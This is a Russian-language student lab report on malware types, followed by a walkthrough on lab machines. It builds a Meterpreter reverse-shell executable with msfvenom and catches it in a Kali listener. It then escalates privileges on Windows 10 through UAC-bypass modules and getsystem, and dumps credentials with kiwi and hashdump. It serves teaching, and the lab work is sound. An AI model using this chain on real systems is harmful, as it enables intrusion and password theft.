Практика №6. Вредоносное программное обеспечение

## Виды Malvare 1. Viruses - вредоносное програмное обеспечение, которое автоматически распространяеся по компьютерам.Цель: уничтожение данных или шифрация 2. Trojan - вредоносное програмное обеспечение, которое отправляет данные на сервер злоумышлинника 3. Malvare shell - вредоносное програмное обеспечение, которое устанавливает соединение с сервером злоумышленником, для управления зараженным устройством. 4. Malvare sctipts(Link) - ссылки с js скриптами или сами скрипты, например для майнинга криптавалюты. 5. Stealer — вредоносное программное обеспечение, предназначенное для кражи ценных данных с зараженной машины, таких как куки-файлы, логины и пароли, скрины с рабочего стола. ## Reverse Shell Зайдем в msfconsole, выберем multi/handler, выставим порт Kali и запустим. изменим lhost на ip адрес Kali изменим payload на windows/x64/meterpreter/reverse_tcp multi/handler будет прослушывать ip адрес Kali порт 4444 и ждать когда поступит соединение. ![image](https://hackmd.io/_uploads/Hy2LV85GR.png) Далее с помощью msfvenom создадим вредоностный exe файл для подключения с помощью meterpreter укажим в параметрах payload windows/x64/meterpreter/reverse_tcp, порт и адрес которые мы прослушиваем с помощью multi/handler и расширене файл exe. ![image](https://hackmd.io/_uploads/S1l3EI5zC.png) Перекинем файл на Win10, предварительно выключив антивирус. Для этого на Kali включим ssh командами sudo systemctl enable ssh sudo service ssh start ![image](https://hackmd.io/_uploads/SyVJnKO7R.png) С помощью команды sudo systemctl status ssh проверим, что все работает. ![image](https://hackmd.io/_uploads/HJUN2FdmA.png) В Win10 зайдем в консоль и перекинем файл с помощью scp командой scp \*пользователь\*:\*ip Kali\* \*путь к файлу на Kali\* \*путь сохранения на win10\* ![image](https://hackmd.io/_uploads/S1g2oKdmA.png) Запустим файл. Увидим, что мы смогли подключиться на Kali. ![image](https://hackmd.io/_uploads/H1JbrL9fR.png) ## LPE - Local Privilege Escolation ### 1. Способ Для повышения привилегий уберем текущую сессию в бэкграунд c помощью команды bg. выберем exploit windows/local/bypassuac_injection с помощью команды use exploit/windows/local/bypassuac_injection В настройках эксплойта изменим сессию на номер той, которую убрали в бэкграунд. Так же выберем windows(x64) запустим с помощью команды run ![image](https://hackmd.io/_uploads/SkDDBqqMR.png) Создастся новая сессия. Перейдем в нее с помощью команды sessions \*номер сессии\* Напишем getsystem для повышения привилегий. С помощью getuid проверим текущего ползователя. ![image](https://hackmd.io/_uploads/By03Sq5zA.png) ### 2. Способ Для повышения привилегий уберем текущую сессию в бэкграунд. выберем exploit windows/local/bypassuac_sdctl изменим сессию на убранную в бэкграунд и запустим ![image](https://hackmd.io/_uploads/Syd-6qkQA.png) ### 3. Способ Для повышения привилегий запустим создыннй exe файл от имени администратора. ![image](https://hackmd.io/_uploads/rJwiaK_mR.png) В созданной сессии напишем getsystem и мы получим права системы. ![image](https://hackmd.io/_uploads/B1b7s91QA.png) ## Creads_all Можем получить учетные записи системы. Для этого загрузим модуль kiwi load kiwi и пропишем creds_all ![image](https://hackmd.io/_uploads/SysrD95G0.png) Как можем заметить, пароли не показались. Попробуем другой способ. ## Post С помощью post/windows/gather/hashdump. Для этого выберем данный пост use post/windows/gather/hashdump Затем укжем номер сессиии с win10 set session \*номер сессии\* запустим с помощью команды run ![image](https://hackmd.io/_uploads/HyLwboJmR.png)